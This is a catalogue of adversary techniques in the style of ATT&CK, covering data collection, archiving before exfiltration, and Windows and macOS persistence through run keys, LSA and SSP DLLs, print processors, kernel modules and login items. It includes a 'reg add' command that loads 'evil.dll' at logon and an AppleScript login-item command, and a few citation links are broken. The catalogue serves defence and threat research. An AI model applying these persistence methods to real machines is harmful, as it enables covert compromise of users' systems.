Adversaries may attempt to get a listing of open application windows. Window listings could convey information about how the system is used.<sup>[[Prevailion DarkWatchman 2021](https://app.tidalcyber.com/references/449e7b5c-7c62-4a63-a676-80026a597fc9)]</sup> For example, information about application windows could be used identify potential data to collect as well as identifying security tooling ([Security Software Discovery](https://app.tidalcyber.com/technique/9e945aa5-3883-4537-a767-f49bdcce26c7)) to evade.<sup>[[ESET Grandoreiro April 2020](https://app.tidalcyber.com/references/d6270492-986b-4fb6-bdbc-2e364947847c)]</sup>

Adversaries typically abuse system features for this type of enumeration. For example, they may gather information through native system features such as [Command and Scripting Interpreter](https://app.tidalcyber.com/technique/a2184d53-63b1-4c40-81ed-da799080c36c) commands and [Native API](https://app.tidalcyber.com/technique/1120f5ec-ef1b-4596-8d8b-a3979a766560) functions.

The tag is: misp-galaxy:technique="Application Window Discovery"

Archive via Custom Method

An adversary may compress or encrypt data that is collected prior to exfiltration using a custom method. Adversaries may choose to use custom archival methods, such as encryption with XOR or stream ciphers implemented with no external library or utility references. Custom implementations of well-known compression algorithms have also been used.<sup>[[ESET Sednit Part 2](https://app.tidalcyber.com/references/aefb9eda-df5a-437f-af2a-ec1b6c04628b)]</sup>

The tag is: misp-galaxy:technique="Archive via Custom Method"

Archive via Library

An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party libraries. Many libraries exist that can archive data, including [Python](https://app.tidalcyber.com/technique/68fed1c9-e060-4c4d-83d9-d8c817893d65) rarfile <sup>[[PyPI RAR](https://app.tidalcyber.com/references/e40d1cc8-b8c7-4f43-b6a7-c50a4f7bf1f0)]</sup>, libzip <sup>[[libzip](https://app.tidalcyber.com/references/e7008738-101c-4903-a9fc-b0bd28d66069)]</sup>, and zlib <sup>[[Zlib Github](https://app.tidalcyber.com/references/982bcacc-afb2-4bbb-9197-f44d765b9e07)]</sup>. Most libraries include functionality to encrypt and/or compress data.

Some archival libraries are preinstalled on systems, such as bzip2 on macOS and Linux, and zip on Windows. Note that the libraries are different from the utilities. The libraries can be linked against when compiling, while the utilities require spawning a subshell, or a similar execution mechanism.

The tag is: misp-galaxy:technique="Archive via Library"

Archive via Utility

Adversaries may use utilities to compress and/or encrypt collected data prior to exfiltration. Many utilities include functionalities to compress, encrypt, or otherwise package data into a format that is easier/more secure to transport.

Adversaries may abuse various utilities to compress or encrypt data before exfiltration. Some third party utilities may be preinstalled, such as <code>tar</code> on Linux and macOS or <code>zip</code> on Windows systems.

On Windows, <code>diantz</code> or <code> makecab</code> may be used to package collected files into a cabinet (.cab) file. <code>diantz</code> may also be used to download and compress files from remote locations (i.e. [Remote Data Staging]([diantz.exe_lolbas(https://app.tidalcyber.com/references/66652db8-5594-414f-8a6b-83d708a0c1fa)]</sup> <code>xcopy</code> on Windows can copy files and directories with a variety of options. Additionally, adversaries may use [certutil](https://app.tidalcyber.com/software/2fe21578-ee31-4ee8-b6ab-b5f76f97d043) to Base64 encode collected data before exfiltration.

Adversaries may use also third party utilities, such as 7-Zip, WinRAR, and WinZip, to perform similar activities.<sup>[[7zip Homepage](https://app.tidalcyber.com/references/fc1396d2-1ffd-4fd9-ba60-3f6e0a9dfffb)]</sup><sup>[[WinRAR Homepage](https://app.tidalcyber.com/references/c1334e4f-67c8-451f-b50a-86003f6e3d3b)]</sup><sup>[[WinZip Homepage](https://app.tidalcyber.com/references/dc047688-2ea3-415c-b516-06542048b049)]</sup>

The tag is: misp-galaxy:technique="Archive via Utility"

Archive Collected Data

An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.

Both compression and encryption are done prior to exfiltration, and can be performed using a utility, 3rd party library, or custom method.

The tag is: misp-galaxy:technique="Archive Collected Data"

Audio Capture

An adversary can leverage a computer’s peripheral devices (e.g., microphones and webcams) or applications (e.g., voice and video call services) to capture audio recordings for the purpose of listening into sensitive conversations to gather information.

Malware or scripts may be used to interact with the devices through an available API provided by the operating system or an application to capture audio. Audio files may be written to disk and exfiltrated later.

The tag is: misp-galaxy:technique="Audio Capture"

Automated Collection

Once established within a system or network, an adversary may use automated techniques for collecting internal data. Methods for performing this technique could include use of a [Command and Scripting Interpreter](https://app.tidalcyber.com/technique/a2184d53-63b1-4c40-81ed-da799080c36c) to search for and copy information fitting set criteria such as file type, location, or name at specific time intervals. In cloud-based environments, adversaries may also use cloud APIs, command line interfaces, or extract, transform, and load (ETL) services to automatically collect data. This functionality could also be built into remote access tools.

This technique may incorporate use of other techniques such as [File and Directory Discovery](https://app.tidalcyber.com/technique/1492c4ba-c933-47b8-953d-6de3db8cfce8) and [Lateral Tool Transfer](https://app.tidalcyber.com/technique/3dea57fc-3131-408b-a1fd-ff2eea1d858f) to identify and move files, as well as [Cloud Service Dashboard](https://app.tidalcyber.com/technique/315ce434-ad6d-4dae-a1dd-6db944a44422) and [Cloud Storage Object Discovery](https://app.tidalcyber.com/technique/92761d92-a288-4407-a112-bb2720f07d07) to identify resources in cloud environments.

The tag is: misp-galaxy:technique="Automated Collection"

Traffic Duplication

Adversaries may leverage traffic mirroring in order to automate data exfiltration over compromised infrastructure. Traffic mirroring is a native feature for some devices, often used for network analysis. For example, devices may be configured to forward network traffic to one or more destinations for analysis by a network analyzer or other monitoring device. <sup>[[Cisco Traffic Mirroring](https://app.tidalcyber.com/references/1a5c86ad-d3b1-408b-a6b4-14ca0e572020)]</sup><sup>[[Juniper Traffic Mirroring](https://app.tidalcyber.com/references/a6f62986-0b62-4316-b762-021f1bb14903)]</sup>

Adversaries may abuse traffic mirroring to mirror or redirect network traffic through other infrastructure they control. Malicious modifications to network devices to enable traffic redirection may be possible through [ROMMONkit](https://app.tidalcyber.com/technique/b9d60848-388e-444c-9f22-2267ea61b5e9) or [Patch System Image]([US-CERT-TA18-106A(https://app.tidalcyber.com/references/1fe55557-94af-4697-a675-884701f70f2a)]</sup><sup>[[Cisco Blog Legacy Device Attacks](https://app.tidalcyber.com/references/f7ce5099-7e04-4c0b-8767-e0eec664b18e)]</sup>

Many cloud-based environments also support traffic mirroring. For example, AWS Traffic Mirroring, GCP Packet Mirroring, and Azure vTap allow users to define specified instances to collect traffic from and specified targets to send collected traffic to.<sup>[[AWS Traffic Mirroring](https://app.tidalcyber.com/references/6b77a2f3-39b8-4574-8dee-cde7ba9debff)]</sup><sup>[[GCP Packet Mirroring](https://app.tidalcyber.com/references/c91c6399-3520-4410-936d-48c3b13235ca)]</sup><sup>[[Azure Virtual Network TAP](https://app.tidalcyber.com/references/3f106d7e-f101-4adb-bbd1-d8c04a347f85)]</sup>

Adversaries may use traffic duplication in conjunction with [Network Sniffing](https://app.tidalcyber.com/technique/bbad213d-477d-43bf-9501-ad7d74bac323), [Input Capture](https://app.tidalcyber.com/technique/5ee96331-a7b7-4c32-a8f1-3fb164078f5f), or [Adversary-in-the-Middle](https://app.tidalcyber.com/technique/d98dbf30-c454-42ff-a9f3-2cd3319cc0d9) depending on the goals and objectives of the adversary.

The tag is: misp-galaxy:technique="Traffic Duplication"

Automated Exfiltration

Adversaries may exfiltrate data, such as sensitive documents, through the use of automated processing after being gathered during Collection.

When automated exfiltration is used, other exfiltration techniques likely apply as well to transfer the information out of the network, such as [Exfiltration Over C2 Channel](https://app.tidalcyber.com/technique/89203cae-d3f1-4eef-9b5a-29042eb05d19) and [Exfiltration Over Alternative Protocol](https://app.tidalcyber.com/technique/192d25ea-bae1-48e4-88de-e0acd481ab88).

The tag is: misp-galaxy:technique="Automated Exfiltration"

BITS Jobs

Adversaries may abuse BITS jobs to persistently execute code and perform various background tasks. Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://app.tidalcyber.com/technique/8bc683db-1311-476f-8cae-45f3f89dcc66) (COM).<sup>[[Microsoft COM](https://app.tidalcyber.com/references/edcd917d-ca5b-4e5c-b3be-118e828abe97)]</sup><sup>[[Microsoft BITS](https://app.tidalcyber.com/references/3d925a69-35f3-4337-8e1e-275de4c1783e)]</sup> BITS is commonly used by updaters, messengers, and other applications preferred to operate in the background (using available idle bandwidth) without interrupting other networked applications. File transfer tasks are implemented as BITS jobs, which contain a queue of one or more file operations.

Adversaries may abuse BITS to download (e.g. [Ingress Tool Transfer](https://app.tidalcyber.com/technique/4499ce34-9871-4879-883c-19ddb940f242)), execute, and even clean up after running malicious code (e.g. [Indicator Removal](https://app.tidalcyber.com/technique/fa1507f1-c763-4af1-8bd9-a2fb8f7904be)). BITS tasks are self-contained in the BITS job database, without new files or registry modifications, and often permitted by host firewalls.<sup>[[CTU BITS Malware June 2016](https://app.tidalcyber.com/references/db98b15c-399d-4a4c-8fa6-5a4ff38c3853)]</sup><sup>[[Mondok Windows PiggyBack BITS May 2007](https://app.tidalcyber.com/references/7dd03a92-11b8-4b8a-9d34-082ecf09a6e4)]</sup><sup>[[Symantec BITS May 2007](https://app.tidalcyber.com/references/e5962c87-0d42-46c2-8757-91f264fc570f)]</sup> BITS enabled execution may also enable persistence by creating long-standing jobs (the default maximum lifetime is 90 days and extendable) or invoking an arbitrary program when a job completes or errors (including after system reboots).<sup>[[PaloAlto UBoatRAT Nov 2017](https://app.tidalcyber.com/references/235a1129-2f35-4861-90b8-1f761d89b0f9)]</sup><sup>[[CTU BITS Malware June 2016](https://app.tidalcyber.com/references/db98b15c-399d-4a4c-8fa6-5a4ff38c3853)]</sup>

BITS upload functionalities can also be used to perform [Exfiltration Over Alternative Protocol]([CTU BITS Malware June 2016(https://app.tidalcyber.com/references/db98b15c-399d-4a4c-8fa6-5a4ff38c3853)]</sup>

The tag is: misp-galaxy:technique="BITS Jobs"

Active Setup

Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine. Active Setup is a Windows mechanism that is used to execute programs when a user logs in. The value stored in the Registry key will be executed after a user logs into the computer.<sup>[[Klein Active Setup 2010](https://app.tidalcyber.com/references/cbdd6290-1dda-48af-a101-fb3db6581276)]</sup> These programs will be executed under the context of the user and will have the account’s associated permissions level.

Adversaries may abuse Active Setup by creating a key under <code> HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\</code> and setting a malicious value for <code>StubPath</code>. This value will serve as the program that will be executed when a user logs into the computer.<sup>[[Mandiant Glyer APT 2010](https://app.tidalcyber.com/references/bb336a6f-d76e-4535-ba81-0c7932ae91e3)]</sup><sup>[[Citizenlab Packrat 2015](https://app.tidalcyber.com/references/316f347f-3e92-4861-a075-db64adf6b6a8)]</sup><sup>[[FireEye CFR Watering Hole 2012](https://app.tidalcyber.com/references/6108ab77-e4fd-43f2-9d49-8ce9c219ca9c)]</sup><sup>[[SECURELIST Bright Star 2015](https://app.tidalcyber.com/references/59cba16f-91ed-458c-91c9-5b02c03678f5)]</sup><sup>[[paloalto Tropic Trooper 2016](https://app.tidalcyber.com/references/47524b17-1acd-44b1-8de5-168369fa9455)]</sup>

Adversaries can abuse these components to execute malware, such as remote access tools, to maintain persistence through system reboots. Adversaries may also use [Masquerading](https://app.tidalcyber.com/technique/a0adacc1-8d2a-4e0b-92c1-3766264df4fd) to make the Registry entries look as if they are associated with legitimate programs.

The tag is: misp-galaxy:technique="Active Setup"

Authentication Package

Adversaries may abuse authentication packages to execute DLLs when the system boots. Windows authentication package DLLs are loaded by the Local Security Authority (LSA) process at system start. They provide support for multiple logon processes and multiple security protocols to the operating system.<sup>[[MSDN Authentication Packages](https://app.tidalcyber.com/references/e9bb8434-9b6d-4301-bfe2-5c83ceabb020)]</sup>

Adversaries can use the autostart mechanism provided by LSA authentication packages for persistence by placing a reference to a binary in the Windows Registry location <code>HKLM\SYSTEM\CurrentControlSet\Control\Lsa\</code> with the key value of <code>"Authentication Packages"=<target binary></code>. The binary will then be executed by the system when the authentication packages are loaded.

The tag is: misp-galaxy:technique="Authentication Package"

Kernel Modules and Extensions

Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system.<sup>[[Linux Kernel Programming](https://app.tidalcyber.com/references/70f31f19-e0b3-40b1-b8dd-6667557bb334)]</sup> 

When used maliciously, LKMs can be a type of kernel-mode [Rootkit](https://app.tidalcyber.com/technique/cf2b56f6-3ebd-48ec-b9d9-835397acef89) that run with the highest operating system privilege (Ring 0).<sup>[[Linux Kernel Module Programming Guide](https://app.tidalcyber.com/references/ceefe610-0b26-4307-806b-17313d570511)]</sup> Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors, and enabling root access to non-privileged users.<sup>[[iDefense Rootkit Overview](https://app.tidalcyber.com/references/c1aef861-9e31-42e6-a2eb-5151b056762b)]</sup>

Kernel extensions, also called kext, are used in macOS to load functionality onto a system similar to LKMs for Linux. Since the kernel is responsible for enforcing security and the kernel extensions run as apart of the kernel, kexts are not governed by macOS security policies. Kexts are loaded and unloaded through <code>kextload</code> and <code>kextunload</code> commands. Kexts need to be signed with a developer ID that is granted privileges by Apple allowing it to sign Kernel extensions. Developers without these privileges may still sign kexts but they will not load unless SIP is disabled. If SIP is enabled, the kext signature is verified before being added to the AuxKC.<sup>[[System and kernel extensions in macOS](https://app.tidalcyber.com/references/e5c4974d-dfd4-4c1c-ba4c-b6fb276effac)]</sup>

Since macOS Catalina 10.15, kernel extensions have been deprecated in favor of System Extensions. However, kexts are still allowed as "Legacy System Extensions" since there is no System Extension for Kernel Programming Interfaces.<sup>[[Apple Kernel Extension Deprecation](https://app.tidalcyber.com/references/86053c5a-f2dd-4eb3-9dc2-6a6a4e1c2ae5)]</sup>

Adversaries can use LKMs and kexts to conduct [Persistence](https://app.tidalcyber.com/tactics/ec4f9786-c00c-430a-bc6d-0d0d22fdd393) and/or [Privilege Escalation](https://app.tidalcyber.com/tactics/b17dde68-dbcf-4cfd-9bb8-be014ec65c37) on a system. Examples have been found in the wild, and there are some relevant open source projects as well.<sup>[[Volatility Phalanx2](https://app.tidalcyber.com/references/6149f9ed-9218-489b-b87c-8208de89be68)]</sup><sup>[[CrowdStrike Linux Rootkit](https://app.tidalcyber.com/references/eb3590bf-ff12-4ccd-bf9d-cf8eacd82135)]</sup><sup>[[GitHub Reptile](https://app.tidalcyber.com/references/6e8cc88a-fb3f-4464-9380-868f597def6e)]</sup><sup>[[GitHub Diamorphine](https://app.tidalcyber.com/references/92993055-d2e6-46b2-92a3-ad70b62e4cc0)]</sup><sup>[[RSAC 2015 San Francisco Patrick Wardle](https://app.tidalcyber.com/references/7e3f3dda-c407-4b06-a6b0-8b72c4dad6e6)]</sup><sup>[[Synack Secure Kernel Extension Broken](https://app.tidalcyber.com/references/647f6be8-fe95-4045-8778-f7d7ff00c96c)]</sup><sup>[[Securelist Ventir](https://app.tidalcyber.com/references/5e4e82c0-16b6-43bc-a70d-6b8d55aaef52)]</sup><sup>[[Trend Micro Skidmap](https://app.tidalcyber.com/references/53291621-f0ad-4cb7-af08-78b96eb67168)]</sup>

The tag is: misp-galaxy:technique="Kernel Modules and Extensions"

Login Items

Adversaries may add login items to execute upon user login to gain persistence or escalate privileges. Login items are applications, documents, folders, or server connections that are automatically launched when a user logs in.<sup>[[Open Login Items Apple](https://app.tidalcyber.com/references/46a480eb-52d1-44c9-8b44-7e516b27cf82)]</sup> Login items can be added via a shared file list or Service Management Framework.<sup>[[Adding Login Items](https://app.tidalcyber.com/references/5ab3e243-37a6-46f1-b28f-6846ecdef0ae)]</sup> Shared file list login items can be set using scripting languages such as [AppleScript](https://app.tidalcyber.com/technique/9f06ef9b-d587-41d3-8fc8-7d539dac5701), whereas the Service Management Framework uses the API call <code>SMLoginItemSetEnabled</code>.

Login items installed using the Service Management Framework leverage <code>launchd</code>, are not visible in the System Preferences, and can only be removed by the application that created them.<sup>[[Adding Login Items](https://app.tidalcyber.com/references/5ab3e243-37a6-46f1-b28f-6846ecdef0ae)]</sup><sup>[[SMLoginItemSetEnabled Schroeder 2013](https://app.tidalcyber.com/references/ad14bad2-95c8-49b0-9777-e464fc8359a0)]</sup> Login items created using a shared file list are visible in System Preferences, can hide the application when it launches, and are executed through LaunchServices, not launchd, to open applications, documents, or URLs without using Finder.<sup>[[Launch Services Apple Developer](https://app.tidalcyber.com/references/9973ceb1-2fee-451b-a512-c544671ee9fd)]</sup> Users and applications use login items to configure their user environment to launch commonly used services or applications, such as email, chat, and music applications.

Adversaries can utilize [AppleScript](https://app.tidalcyber.com/technique/9f06ef9b-d587-41d3-8fc8-7d539dac5701) and [Native API](https://app.tidalcyber.com/technique/1120f5ec-ef1b-4596-8d8b-a3979a766560) calls to create a login item to spawn malicious executables.<sup>[[ELC Running at startup](https://app.tidalcyber.com/references/11ee6303-5103-4063-a765-659ead217c6c)]</sup> Prior to version 10.5 on macOS, adversaries can add login items by using [AppleScript](https://app.tidalcyber.com/technique/9f06ef9b-d587-41d3-8fc8-7d539dac5701) to send an Apple events to the “System Events” process, which has an AppleScript dictionary for manipulating login items.<sup>[[Login Items AE](https://app.tidalcyber.com/references/d15943dd-d11c-4af2-a3ac-9ebe168a7526)]</sup> Adversaries can use a command such as <code>tell application “System Events” to make login item at end with properties /path/to/executable</code>.<sup>[[Startup Items Eclectic](https://app.tidalcyber.com/references/397be6f9-a109-4185-85f7-8d994fb31eaa)]</sup><sup>[[hexed osx.dok analysis 2019](https://app.tidalcyber.com/references/96f9d36a-01a5-418e-85f4-957e58d49c1b)]</sup><sup>[[Add List Remove Login Items Apple Script](https://app.tidalcyber.com/references/13773d75-6fc1-4289-bf45-6ee147279052)]</sup> This command adds the path of the malicious executable to the login item file list located in <code>~/Library/Application Support/com.apple.backgroundtaskmanagementagent/backgrounditems.btm</code>.<sup>[[Startup Items Eclectic](https://app.tidalcyber.com/references/397be6f9-a109-4185-85f7-8d994fb31eaa)]</sup> Adversaries can also use login items to launch executables that can be used to control the victim system remotely or as a means to gain privilege escalation by prompting for user credentials.<sup>[[objsee mac malware 2017](https://app.tidalcyber.com/references/08227ae5-4086-4c31-83d9-459c3a097754)]</sup><sup>[[CheckPoint Dok](https://app.tidalcyber.com/references/8c178fd8-db34-45c6-901a-a8b2c178d809)]</sup><sup>[[objsee netwire backdoor 2019](https://app.tidalcyber.com/references/866c5305-8629-4f09-8dfe-192c8573ffb0)]</sup>

The tag is: misp-galaxy:technique="Login Items"

LSASS Driver

Adversaries may modify or add LSASS drivers to obtain persistence on compromised systems. The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS) lsass.exe process.<sup>[[Microsoft Security Subsystem](https://app.tidalcyber.com/references/27dae010-e3b3-4080-8039-9f89a29607e6)]</sup>

Adversaries may target LSASS drivers to obtain persistence. By either replacing or adding illegitimate drivers (e.g., [Hijack Execution Flow](https://app.tidalcyber.com/technique/1085d0c6-4ff3-45f1-8e0c-d8f334f4ba68)), an adversary can use LSA operations to continuously execute malicious payloads.

The tag is: misp-galaxy:technique="LSASS Driver"

Port Monitors

Adversaries may use port monitors to run an adversary supplied DLL during system boot for persistence or privilege escalation. A port monitor can be set through the <code>AddMonitor</code> API call to set a DLL to be loaded at startup.<sup>[[AddMonitor](https://app.tidalcyber.com/references/8c1a719e-6ca1-4b41-966d-ddb87c849fe0)]</sup> This DLL can be located in <code>C:\Windows\System32</code> and will be loaded by the print spooler service, spoolsv.exe, on boot. The spoolsv.exe process also runs under SYSTEM level permissions.<sup>[[Bloxham](https://app.tidalcyber.com/references/b212d16f-5347-49ab-8339-432b4fd1ef50)]</sup> Alternatively, an arbitrary DLL can be loaded if permissions allow writing a fully-qualified pathname for that DLL to <code>HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors</code>.

The Registry key contains entries for the following:

  • Local Port

  • Standard TCP/IP Port

  • USB Monitor

  • WSD Port

Adversaries can use this technique to load malicious code at startup that will persist on system reboot and execute as SYSTEM.

The tag is: misp-galaxy:technique="Port Monitors"

Print Processors

Adversaries may abuse print processors to run malicious DLLs during system boot for persistence and/or privilege escalation. Print processors are DLLs that are loaded by the print spooler service, spoolsv.exe, during boot.<sup>[[Microsoft Intro Print Processors](https://app.tidalcyber.com/references/ba04b0d0-1c39-5f48-824c-110ee7affbf3)]</sup>

Adversaries may abuse the print spooler service by adding print processors that load malicious DLLs at startup. A print processor can be installed through the <code>AddPrintProcessor</code> API call with an account that has <code>SeLoadDriverPrivilege</code> enabled. Alternatively, a print processor can be registered to the print spooler service by adding the <code>HKLM\SYSTEM\\[CurrentControlSet or ControlSet001]\Control\Print\Environments\\[Windows architecture: e.g., Windows x64]\Print Processors\\[user defined]\Driver</code> Registry key that points to the DLL.

For the malicious print processor to be correctly installed, the payload must be located in the dedicated system print-processor directory, that can be found with the <code>GetPrintProcessorDirectory</code> API call, or referenced via a relative path from this directory.<sup>[[Microsoft AddPrintProcessor May 2018](https://app.tidalcyber.com/references/12c7160b-c93c-44cd-b108-68d4823aec8c)]</sup> After the print processors are installed, the print spooler service, which starts during boot, must be restarted in order for them to run.<sup>[[ESET PipeMon May 2020](https://app.tidalcyber.com/references/cbc09411-be18-4241-be69-b718a741ed8c)]</sup>

The print spooler service runs under SYSTEM level permissions, therefore print processors installed by an adversary may run under elevated privileges.

The tag is: misp-galaxy:technique="Print Processors"

Registry Run Keys / Startup Folder

Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.<sup>[[Microsoft Run Key](https://app.tidalcyber.com/references/0d633a50-4afd-4479-898e-1a785f5637da)]</sup> These programs will be executed under the context of the user and will have the account’s associated permissions level.

The following run keys are created by default on Windows systems:

  • <code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run</code>

  • <code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce</code>

  • <code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run</code>

  • <code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce</code>

Run keys may exist under multiple hives.<sup>[[Microsoft Wow6432Node 2018](https://app.tidalcyber.com/references/cbc14af8-f0d9-46c9-ae2c-d93d706ac84e)]</sup><sup>[[Malwarebytes Wow6432Node 2016](https://app.tidalcyber.com/references/d4eba34c-d76b-45b4-bcaf-0f13459daaad)]</sup> The <code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceEx</code> is also available but is not created by default on Windows Vista and newer. Registry run key entries can reference programs directly or list them as a dependency.<sup>[[Microsoft Run Key](https://app.tidalcyber.com/references/0d633a50-4afd-4479-898e-1a785f5637da)]</sup> For example, it is possible to load a DLL at logon using a "Depend" key with RunOnceEx: <code>reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "C:\temp\evil[.]dll"</code> <sup>[[Oddvar Moe RunOnceEx Mar 2018](https://app.tidalcyber.com/references/36d52213-8d9f-4642-892b-40460d5631d7)]</sup>

Placing a program within a startup folder will also cause that program to execute when a user logs in. There is a startup folder location for individual user accounts as well as a system-wide startup folder that will be checked regardless of which user account logs in. The startup folder path for the current user is <code>C:\Users\\[Username]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup</code>. The startup folder path for all users is <code>C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp</code>.

The following Registry keys can be used to set startup folder items for persistence:

  • <code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders</code>

  • <code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders</code>

  • <code>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders</code>

  • <code>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders</code>

The following Registry keys can control automatic startup of services during boot:

  • <code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce</code>

  • <code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce</code>

  • <code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices</code>

  • <code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices</code>

Using policy settings to specify startup programs creates corresponding values in either of two Registry keys:

  • <code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run</code>

  • <code>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run</code>

Programs listed in the load value of the registry key <code>HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows</code> run automatically for the currently logged-on user.

By default, the multistring <code>BootExecute</code> value of the registry key <code>HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager</code> is set to <code>autocheck autochk *</code>. This value causes Windows, at startup, to check the file-system integrity of the hard disks if the system has been shut down abnormally. Adversaries can add other programs or processes to this registry value which will automatically launch at boot.

Adversaries can use these configuration locations to execute malware, such as remote access tools, to maintain persistence through system reboots. Adversaries may also use [Masquerading](https://app.tidalcyber.com/technique/a0adacc1-8d2a-4e0b-92c1-3766264df4fd) to make the Registry entries look as if they are associated with legitimate programs.

The tag is: misp-galaxy:technique="Registry Run Keys / Startup Folder"

Re-opened Applications

Adversaries may modify plist files to automatically run an application when a user logs in. When a user logs out or restarts via the macOS Graphical User Interface (GUI), a prompt is provided to the user with a checkbox to "Reopen windows when logging back in".<sup>[[Re-Open windows on Mac](https://app.tidalcyber.com/references/ed907f1e-71d6-45db-8ef3-75bec59c238b)]</sup> When selected, all applications currently open are added to a property list file named <code>com.apple.loginwindow.[UUID].plist</code> within the <code>~/Library/Preferences/ByHost</code> directory.<sup>[[Methods of Mac Malware Persistence](https://app.tidalcyber.com/references/44154472-2894-4161-b23f-46d1b1fd6772)]</sup><sup>[[Wardle Persistence Chapter](https://app.tidalcyber.com/references/6272b9a2-d704-43f3-9e25-6c434bb5d1ef)]</sup> Applications listed in this file are automatically reopened upon the user’s next logon.

Adversaries can establish [Persistence](https://app.tidalcyber.com/tactics/ec4f9786-c00c-430a-bc6d-0d0d22fdd393) by adding a malicious application path to the <code>com.apple.loginwindow.[UUID].plist</code> file to execute payloads when a user logs in.

The tag is: misp-galaxy:technique="Re-opened Applications"

Security Support Provider

Adversaries may abuse security support providers (SSPs) to execute DLLs when the system boots. Windows SSP DLLs are loaded into the Local Security Authority (LSA) process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user’s Domain password or smart card PINs.

The SSP configuration is stored in two Registry keys: <code>HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages</code> and <code>HKLM\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\Security Packages</code>. An adversary may modify these Registry keys to add new SSPs, which will be loaded the next time the system boots, or when the AddSecurityPackage Windows API function is called.<sup>[[Graeber 2014](https://app.tidalcyber.com/references/f2f9a6bf-b4d9-461e-b961-0610ea72faf0)]</sup>

The tag is: misp-galaxy:technique="Security Support Provider"

Shortcut Modification

Adversaries may create or modify shortcuts that can execute a program during system boot or user login. Shortcuts or symbolic links are used to reference other files or programs that will be opened or executed when the shortcut is clicked or executed by a system startup process.

Adversaries may abuse shortcuts in the startup folder to execute their tools and achieve persistence.<sup>[[Shortcut for Persistence ](https://app.tidalcyber.com/references/4a12e927-0511-40b1-85f3-869ffc452c2e)]</sup> Although often used as payloads in an infection chain (e.g. [Spearphishing Attachment](https://app.tidalcyber.com/technique/ba553ad4-5699-4458-ae4e-76e1faa43291)), adversaries may also create a new shortcut as a means of indirection, while also abusing [Masquerading](https://app.tidalcyber.com/technique/a0adacc1-8d2a-4e0b-92c1-3766264df4fd) to make the malicious shortcut appear as a legitimate program. Adversaries can also edit the target path or entirely replace an existing shortcut so their malware will be executed instead of the intended legitimate program.

Shortcuts can also be abused to establish persistence by implementing other methods. For example, LNK browser extensions may be modified (e.g. [Browser Extensions](https://app.tidalcyber.com/technique/040804f6-6a87-4011-8716-66682bc16ed4)) to persistently launch malware.

The tag is: misp-galaxy:technique="Shortcut Modification"

Time Providers

Adversaries may abuse time providers to execute DLLs when the system boots. The Windows Time service (W32Time) enables time synchronization across and within domains.<sup>[[Microsoft W32Time Feb 2018](https://app.tidalcyber.com/references/991f7a9f-4317-42fa-bc9b-f533fe36b517)]</sup> W32Time time providers are responsible for retrieving time stamps from hardware/network resources and outputting these values to other network clients.<sup>[[Microsoft TimeProvider](https://app.tidalcyber.com/references/cf7c1db8-6282-4ccd-9609-5a012faf70d6)]</sup>

Time providers are implemented as dynamic-link libraries (DLLs) that are registered in the subkeys of <code>HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\TimeProviders\</code>.<sup>[[Microsoft TimeProvider](https://app.tidalcyber.com/references/cf7c1db8-6282-4ccd-9609-5a012faf70d6)]</sup> The time provider manager, directed by the service control manager, loads and starts time providers listed and enabled under this key at system startup and/or whenever parameters are changed.<sup>[[Microsoft TimeProvider](https://app.tidalcyber.com/references/cf7c1db8-6282-4ccd-9609-5a012faf70d6)]</sup>

